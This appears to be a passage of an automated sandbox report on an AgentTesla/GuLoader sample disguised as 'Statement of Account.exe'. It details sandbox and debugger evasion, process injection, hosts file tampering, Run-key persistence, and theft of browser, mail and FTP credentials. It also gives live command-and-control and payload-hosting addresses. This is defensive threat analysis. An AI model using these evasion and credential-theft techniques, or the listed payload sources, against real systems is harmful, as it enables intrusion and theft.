            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeY
            Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Statement of Account.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00403248 mov ebx, dword ptr fs:[00000030h]1_2_00403248
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0040225E mov ebx, dword ptr fs:[00000030h]1_2_0040225E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_004031BE mov ebx, dword ptr fs:[00000030h]1_2_004031BE
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_012876A6 KiUserExceptionDispatcher,LdrInitializeThunk,9_2_012876A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1360000Jump to behavior
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
            Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmpBinary or memory string: :Program Managerev
            Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeQueries volume information: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeQueries volume information: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1File and Directory Permissions Modification1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1Credentials in Registry1System Information Discovery115Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery421SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion341SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion341Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640 Sample: Statement of Account.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 30 mail.friendsequipment.com 2->30 32 friendsequipment.com 2->32 34 3 other IPs or domains 2->34 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Potential malicious icon found 2->52 54 Found malware configuration 2->54 56 6 other signatures 2->56 8 Statement of Account.exe 2->8         started        11 DnDcR.exe 2 2->11         started        13 DnDcR.exe 1 2->13         started        signatures3 process4 signatures5 58 Writes to foreign memory regions 8->58 60 Tries to detect Any.run 8->60 62 Hides threads from debuggers 8->62 15 RegAsm.exe 2 11 8->15         started        20 conhost.exe 11->20         started        22 conhost.exe 13->22         started        process6 dnsIp7 36 friendsequipment.com 65.60.11.90, 49821, 587 SINGLEHOP-LLCUS United States 15->36 38 googlehosted.l.googleusercontent.com 142.250.181.225, 443, 49810 GOOGLEUS United States 15->38 40 drive.google.com 172.217.168.46, 443, 49809 GOOGLEUS United States 15->40 26 C:\Users\user\AppData\Roaming\...\DnDcR.exe, PE32 15->26 dropped 28 C:\Windows\System32\drivers\etc\hosts, ASCII 15->28 dropped 42 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->42 44 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->44 46 Tries to steal Mail credentials (via file access) 15->46 48 7 other signatures 15->48 24 conhost.exe 15->24         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Statement of Account.exe24%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            friendsequipment.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://LUDB17WCKZR.org0%Avira URL Cloudsafe
            http://VpGUaC.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://api.ipify.org%40%Avira URL Cloudsafe
            http://mail.friendsequipment.com0%Avira URL Cloudsafe
            https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
            http://friendsequipment.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            friendsequipment.com
            		65.60.11.90
            		truetrueunknown
            drive.google.com
            		172.217.168.46
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.181.225
              		truefalse
                		high
                doc-0g-4k-docs.googleusercontent.com
                		unknown
                		unknownfalse
                  		high
                  mail.friendsequipment.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=downloadfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://doc-0g-4k-docs.googleusercontent.com/RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmpfalse
                        		high
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://DynDns.comDynDNSRegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://LUDB17WCKZR.orgRegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81lRegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmpfalse
                          		high
                          http://VpGUaC.comRegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.google.com/RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpfalse
                            		high
                            https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.comRegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmpfalse
                              		high
                              https://api.ipify.org%4RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://mail.friendsequipment.comRegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://drive.google.com/QRegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpfalse
                                		high
                                https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.ipify.org%GETMozilla/5.0RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://friendsequipment.comRegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://doc-0g-4k-docs.googleusercontent.com/4RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmpfalse
                                    		high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.217.168.46
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    65.60.11.90
                                    		friendsequipment.comUnited States
                                    		32475SINGLEHOP-LLCUStrue
                                    142.250.181.225
                                    		googlehosted.l.googleusercontent.comUnited States
                                    		15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:1640
                                    Start date:13.10.2021
                                    Start time:14:36:22
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 12s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Statement of Account.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 95
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                    • Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.82.207.122, 20.82.210.154, 92.123.195.35, 92.123.195.73, 8.248.135.254, 8.248.133.254, 67.27.233.126, 67.26.81.254, 8.248.113.254, 93.184.221.240
                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    14:39:46API Interceptor2407x Sleep call for process: RegAsm.exe modified
                                    14:40:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DnDcR C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                    14:40:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DnDcR C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    SINGLEHOP-LLCUSJ2roaMGDmh.exeGet hashmaliciousBrowse
                                    • 107.6.155.186
                                    sSQ2BB4tybGet hashmaliciousBrowse
                                    • 108.163.214.223
                                    aUXe29TOLBGet hashmaliciousBrowse
                                    • 199.26.226.95
                                    ASKRJ389.vbsGet hashmaliciousBrowse
                                    • 184.154.116.14
                                    DKWFO7791.vbsGet hashmaliciousBrowse
                                    • 184.154.116.14
                                    PO#006599.pdf.exeGet hashmaliciousBrowse
                                    • 96.127.186.30
                                    PO#006566.pdf.exeGet hashmaliciousBrowse
                                    • 96.127.186.30
                                    FX8w3rI5cwGet hashmaliciousBrowse
                                    • 199.26.251.39
                                    stage2.dllGet hashmaliciousBrowse
                                    • 184.154.46.111
                                    sora.arm7Get hashmaliciousBrowse
                                    • 184.154.183.242
                                    tsunami.x86Get hashmaliciousBrowse
                                    • 65.62.116.34
                                    Unlocker1.9.2.exeGet hashmaliciousBrowse
                                    • 198.143.175.67
                                    DeltaTB.exeGet hashmaliciousBrowse
                                    • 198.143.175.67
                                    armGet hashmaliciousBrowse
                                    • 181.224.143.199
                                    sora.arm7Get hashmaliciousBrowse
                                    • 65.60.30.13
                                    0HXxUcP5S4Get hashmaliciousBrowse
                                    • 198.20.85.242
                                    LAKmNB72J8Get hashmaliciousBrowse
                                    • 107.6.134.203
                                    U6lZQUtrU5Get hashmaliciousBrowse
                                    • 99.198.96.203
                                    shinto.x86Get hashmaliciousBrowse
                                    • 65.63.147.53
                                    GVlpP9RL5tGet hashmaliciousBrowse
                                    • 96.127.141.195

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    37f463bf4616ecd445d4a1937da06e19HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    zrArDsoum0.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    correction HAWB.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    UZWdHg3hWA.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    LBJiq1QBaH.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    Statement of Account.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    Potvrda narudzbe u prilogu.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    art-1881052385.xlsGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    184285013-044310-sanlccjavap0003-7069_pdf (5).exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    DOC 10132021.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    WIRE ADVICE.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    WireCopy.htmlGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    UGS2021100716241.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    WireCopy.htmlGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    Rust_hack_v6.4.2_x64_stable.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    0810202 import Inquiry ref- November order 2021.exeGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225
                                    Document-10122021 81258 PM.htmlGet hashmaliciousBrowse
                                    • 172.217.168.46
                                    • 142.250.181.225

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Roaming\DnDcR\DnDcR.execorrection HAWB.exeGet hashmaliciousBrowse
                                      DOC 10132021.exeGet hashmaliciousBrowse
                                        WIRE ADVICE.exeGet hashmaliciousBrowse
                                          Foreign_Bank Account Details.exeGet hashmaliciousBrowse
                                            SOA.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.961905.21681.exeGet hashmaliciousBrowse
                                                Swift USD 9300.exeGet hashmaliciousBrowse
                                                  SOA.exeGet hashmaliciousBrowse
                                                    justificante.exeGet hashmaliciousBrowse
                                                      Facilitative8.exeGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DnDcR.exe.log
